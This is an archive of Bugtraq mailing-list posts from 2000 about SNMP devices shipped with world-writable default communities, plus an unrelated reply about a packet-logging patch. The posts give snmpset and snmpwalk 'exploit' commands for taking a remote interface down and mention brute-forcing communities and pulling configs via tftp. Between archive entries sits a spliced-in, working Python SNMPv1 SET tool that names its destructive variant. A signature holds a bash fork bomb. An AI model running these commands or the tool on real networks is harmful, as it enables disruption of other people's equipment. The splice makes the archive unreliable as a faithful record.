4802434 2000-02-15  23:40  /80 lines/ Postmaster
Recipient: Bugtraq (import) <9794>
Subject: snmp problems still alive...
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
X-Sender: lcamtuf@nimue.ids.pl
X-Nmymbofr: Nir Orb Buk
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <lcamtuf.4.05.10001261159540.1259-100000@nimue.ids.pl>
Date:         Mon, 14 Feb 2000 20:00:08 +0100
Reply-To: Michal Zalewski <lcamtuf@AGS.PL>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Michal Zalewski <lcamtuf@AGS.PL>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <Pine.LNX.4.21.0002141022210.3096-100000@dione.ids.pl>

Days ago, there was a discussion about world-readable snmp
communities, some people thought it was bad enough. Amazingly, I've
found that a lot of network devices (such as intelligent switches,
WAN/LAN routers, ISDN/DSL modems, remote access machines and even
some user-end operating systems) are by default configured with snmp
enabled and unlimited access with *write* privileges. It allows an
attacker to modify routing tables, status of network interfaces and
other vital system data, and seems to be extremely dangerous. To make
things even worse, some devices seem to tell that write permission
for a given community is disabled, but you can still successfully write
to it - and other devices won't let you set up snmp access at all
(eg. some modems and switches).

Here's a brief list of devices I've found with world-writable
communities - and names of these communities, respectively:

- 3com Switch 3300 (3Com SuperStack II) - private
- Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
- 3com RAS (HiPer Access Router Card) - public
- Prestige 128 / 128 Plus - public
- COLTSOHO 2.00.21 - private
- PRT BRI ISDN router - public
- CrossCom XL 2 - private
- WaiLAN Agate 700/800 - public
- HPJ3245A HP Switch 800T - public
- ES-2810 FORE ES-2810, Version 2.20 - public
- Windows NT Version 4.0 - public
- Windows 98 (not 95) - public
- Sun/SPARC Ultra 10 (Ultra-5_10) - private

This list is for sure incomplete, and might be inaccurate - it has
been created after extensive, but only remote tests on devices
outside my network (usually, these machines are inside ISP networks).

On the following devices, some parameters can be changed, but some
can't - so it seems to be less dangerous:

- HP LaserJet (EEPROM G.08.03) - public
- PICO router - public
- Xyplex Router 6.1.1 - private

Best solutions:

- try to disable unlimited snmp access, if possible, then check if it
  really worked,
- ask vendor for firmware upgrade,
- do not route traffic addressed to snmp-enabled devices from outside.

Other systems: Cisco and Motorola routers, Netware, most Unix boxes
are not vulnerable.

Exploit code:

$ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2

...should bring the 1st network interface on the remote machine down...
for more interesting options to be set, execute:

$ snmpwalk hostname {private|public}

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(4802434) ------------------------------------------(Reflowed)
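The check the post asks for ("then check if it really worked") cannot be read off the device's configuration, since the post reports agents that claim a community is read-only and still accept SETs; the only reliable test is to send a SetRequest and look at the error-status the agent returns. The following is an added example, not code from Zalewski's post or from any of the vendors listed: a self-contained SNMPv1 (RFC 1157) encoder and decoder in plain Python with no third-party modules, which builds the same SetRequest datagram the snmpset line above sends, parses the agent's GetResponse, and probes write access non-destructively by SETting system.sysLocation.0 to the bytes it already holds. The helper names (encode_pdu, parse_response, exchange, community_is_writable) and the documentation-range address used below are assumptions for illustration; the OIDs are standard MIB-2 and the community strings are the ones from the list above.

```python
import socket

IF_ADMIN_STATUS_1 = "1.3.6.1.2.1.2.2.1.7.1"  # interfaces.ifTable.ifEntry.ifAdminStatus.1
SYS_LOCATION_0 = "1.3.6.1.2.1.1.6.0"         # system.sysLocation.0, harmless to rewrite
GET, RESPONSE, SET = 0xA0, 0xA2, 0xA3         # PDU tags
ERRORS = {0: "noError", 1: "tooBig", 2: "noSuchName", 3: "badValue", 4: "readOnly", 5: "genErr"}

def _length(n):  # BER length: short form below 128, long form otherwise
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def _tlv(tag, body):
    return bytes([tag]) + _length(len(body)) + body

def enc_int(value):  # INTEGER, minimal two's complement
    return _tlv(0x02, value.to_bytes((value.bit_length() + 8) // 8, "big", signed=True))

def enc_oid(dotted):  # OBJECT IDENTIFIER: first two arcs as 40*x+y, the rest base-128
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = [arc & 0x7F]
        arc >>= 7
        while arc:
            chunk.append(0x80 | (arc & 0x7F))
            arc >>= 7
        out += bytes(reversed(chunk))
    return _tlv(0x06, bytes(out))

def dec_oid(body):
    arcs, acc = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        acc = (acc << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(acc)
            acc = 0
    return ".".join(map(str, arcs))

def enc_varbind(oid, value):  # None -> NULL (for GET), int -> INTEGER, bytes -> OCTET STRING
    val = (b"\x05\x00" if value is None else
           enc_int(value) if isinstance(value, int) else _tlv(0x04, value))
    return _tlv(0x30, enc_oid(oid) + val)

def encode_pdu(pdu_tag, community, request_id, varbinds, error_status=0, error_index=0):
    """Whole SNMPv1 message: SEQUENCE { version 0, community, PDU }."""
    pdu = _tlv(pdu_tag, enc_int(request_id) + enc_int(error_status) + enc_int(error_index)
               + _tlv(0x30, b"".join(enc_varbind(o, v) for o, v in varbinds)))
    return _tlv(0x30, enc_int(0) + _tlv(0x04, community.encode()) + pdu)

def _read_tlv(buf, pos=0):
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:  # long-form length
        n = length & 0x7F
        length, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + length], pos + length

def _read_seq(body):  # split a SEQUENCE body into (tag, value) items
    items, pos = [], 0
    while pos < len(body):
        tag, val, pos = _read_tlv(body, pos)
        items.append((tag, val))
    return items

def _dec_value(tag, val):  # INTEGER; Counter/Gauge/TimeTicks; NULL; anything else stays raw bytes
    if tag == 0x02: return int.from_bytes(val, "big", signed=True)
    if tag in (0x41, 0x42, 0x43): return int.from_bytes(val, "big")
    return None if tag == 0x05 else val

def parse_response(datagram):  # request id, symbolic error-status and decoded varbinds
    tag, msg, _ = _read_tlv(datagram)
    (_, _), (_, _), (pdu_tag, pdu) = _read_seq(msg)  # version, community, PDU
    if tag != 0x30 or pdu_tag != RESPONSE:
        raise ValueError("not an SNMPv1 GetResponse")
    (_, rid), (_, status), (_, index), (_, vbl) = _read_seq(pdu)
    binds = []
    for _, vb in _read_seq(vbl):
        (_, oid), (vtag, vval) = _read_seq(vb)
        binds.append((dec_oid(oid), _dec_value(vtag, vval)))
    status = int.from_bytes(status, "big", signed=True)
    return {"request_id": int.from_bytes(rid, "big", signed=True),
            "error": ERRORS.get(status, "unknown(%d)" % status),
            "error_index": int.from_bytes(index, "big", signed=True), "varbinds": binds}

def exchange(host, community, pdu_tag, varbinds, request_id=1, timeout=2.0):
    # One request/response over UDP/161.  A v1 agent that rejects the community usually
    # answers nothing, so socket.timeout here is the normal "wrong community" signal.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(encode_pdu(pdu_tag, community, request_id, varbinds), (host, 161))
        data, _ = sock.recvfrom(65535)
    return parse_response(data)

def community_is_writable(host, community):
    # Non-destructive probe: SET sysLocation.0 to the bytes it already holds and judge by
    # the agent's answer (noError), not by what the device's configuration claims.
    current = exchange(host, community, GET, [(SYS_LOCATION_0, None)])["varbinds"][0][1]
    return exchange(host, community, SET, [(SYS_LOCATION_0, current)])["error"] == "noError"
```

Call it as community_is_writable("192.0.2.1", "private") (the address is a placeholder from the documentation range); a socket.timeout means the agent answered nothing, which is how a wrong or disabled community normally presents in SNMPv1. The destructive variant from the post is exchange(host, community, SET, [(IF_ADMIN_STATUS_1, 2)]), and encode_pdu shows the exact datagram snmpset puts on the wire for it, useful when you want to match it in a packet capture or an IDS signature.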

4807141 2000-02-17  08:24  /43 lines/ Postmaster
Recipient: Bugtraq (import) <9813>
Subject: Re: Packet Tracing (linux klog patch)
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.BSF.4.20.0002152327130.61203-100000@mx.webgiro.com>
Date:         Tue, 15 Feb 2000 23:32:08 +0100
Reply-To: Andrzej Bialecki <abial@WEBGIRO.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Andrzej Bialecki <abial@WEBGIRO.COM>
X-To:         Dragos Ruiu <dr@DURSEC.COM>
X-cc:         bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <0002121952193T.02552@smp>

On Sat, 12 Feb 2000, Dragos Ruiu wrote:

> How to use it:
> -This patch makes the kernel log all ethernet packets to syslog.
> -The logging happens at the default level.  I.e. normally on.
> -You can turn logging on and off at the console by using the Magic SysRq key
>  and a number to change the logging level.
> -Put the interface into promiscuous mode: ifconfig eth0 promisc
>
> Notes:
> -It makes a neat hotkey sniffer when using the text console too.
> -It seems to run pretty fast. Any benchmark data welcome(-->dr@dursec.com).
> -try a tail -f /var/log/messages for real time display

I was wondering... Are you sure it doesn't overrun the kernel message
buffer? I noticed that sometimes, when you produce tons of messages
from within the kernel, some of them are lost.

I would rather use a package such as NeTraMet for doing this - it also does
very nice traffic compression in the form of flows - very fast,
extremely flexible, uses standard libpcap, doesn't require kernel
patching etc...

Andrzej Bialecki

//  <abial@webgiro.com> WebGiro AB, Sweden (http://www.webgiro.com)
// -------------------------------------------------------------------
// ------ FreeBSD: The Power to Serve. http://www.freebsd.org --------
// --- Small & Embedded FreeBSD: http://www.freebsd.org/~picobsd/ ----
(4807141) ------------------------------------------(Reflowed)
4807145 2000-02-17  08:25  /105 lines/ Postmaster
Recipient: Bugtraq (import) <9814>
Subject: Re: snmp problems still alive...
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-ID:  <Pine.BSF.4.10.10002151643520.73248-100000@gauss.worldinter.net>
Date:         Tue, 15 Feb 2000 16:51:50 -0600
Reply-To: Gus Huber <gus@GAUSS.WORLDINTER.NET>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Gus Huber <gus@GAUSS.WORLDINTER.NET>
X-To:         Michal Zalewski <lcamtuf@AGS.PL>
X-cc:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <lcamtuf.4.05.10001261159540.1259-100000@nimue.ids.pl>

It should be noted in this discussion that MANY of these devices also
through SNMP queries can be completely compromised by either sending
or receiving configuration files from arbitrary locations.  Both
cisco and ascend products support downloading and uploading of
configuration files via tftp from an SNMP query.  From that point it
is trivial to sniff network traffic.  AFAIK, ascend still ships with
the SNMP communities set as public for read-only, and write for RW.
Also many hardware devices do not log queries sent to invalid SNMP
communities in SNMPv1, so it is a simple game of brute force to get
those communities.

To illustrate the damage of leaving your ascends with default
communities, there is a small program that will parse the data from
the ascend sniffing debug mode that can be found at
<http://k0dez.pbx.org/stuff/ascenddump.c>.  (I think it is there)

SNMP should be disabled unless needed, and if it is, it should be
firewalled to the appropriate means...

$0.02.....

gus huber <gus@worldinter.net> some punk kid with a bunch of routers


On Mon, 14 Feb 2000, Michal Zalewski wrote:

> Days ago, there was a discussion about world-readable snmp communities,
> some people thought it was bad enough. Amazingly, I've found that a lot of
> network devices (such as intelligent switches, WAN/LAN routers, ISDN/DSL
> modems, remote access machines and even some user-end operating systems)
> are by default configured with snmp enabled and unlimited access with
> *write* privileges. It allows an attacker to modify routing tables, status of
> network interfaces and other vital system data, and seems to be extremely
> dangerous. To make things even worse, some devices seem to tell that
> write permission for a given community is disabled, but you can still
> successfully write to it - and other devices won't let you set up snmp
> access at all (eg. some modems and switches).
>
> Here's a brief list of devices I've found with world-writable communities -
> and names of these communities, respectively:
>
> - 3com Switch 3300 (3Com SuperStack II) - private
> - Cray MatchBox router (MR-1110 MatchBox Router/FR 2.01) - private
> - 3com RAS (HiPer Access Router Card) - public
> - Prestige 128 / 128 Plus - public
> - COLTSOHO 2.00.21 - private
> - PRT BRI ISDN router - public
> - CrossCom XL 2 - private
> - WaiLAN Agate 700/800 - public
> - HPJ3245A HP Switch 800T - public
> - ES-2810 FORE ES-2810, Version 2.20 - public
> - Windows NT Version 4.0 - public
> - Windows 98 (not 95) - public
> - Sun/SPARC Ultra 10 (Ultra-5_10) - private
>
> This list is for sure incomplete, and might be inaccurate - it has been
> created after extensive, but only remote tests on devices outside my
> network (usually, these machines are inside ISP networks).
>
> On the following devices, some parameters can be changed, but some can't - so
> it seems to be less dangerous:
>
> - HP LaserJet (EEPROM G.08.03) - public
> - PICO router - public
> - Xyplex Router 6.1.1 - private
>
> Best solutions:
>
> - try to disable unlimited snmp access, if possible, then check if it
>   really worked,
> - ask vendor for firmware upgrade,
> - do not route traffic addressed to snmp-enabled devices from outside.
>
> Other systems: Cisco and Motorola routers, Netware, most Unix boxes are
> not vulnerable.
>
> Exploit code:
>
> $ snmpset hostname {private|public} interfaces.ifTable.ifEntry.ifAdminStatus.1 i 2
>
> ...should bring the 1st network interface on the remote machine down... for more
> interesting options to be set, execute:
>
> $ snmpwalk hostname {private|public}
>
> _______________________________________________________
> Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
> [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
> [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
> =-----=> God is real, unless declared integer. <=-----=
>
(4807145) ------------------------------------------(Reflowed)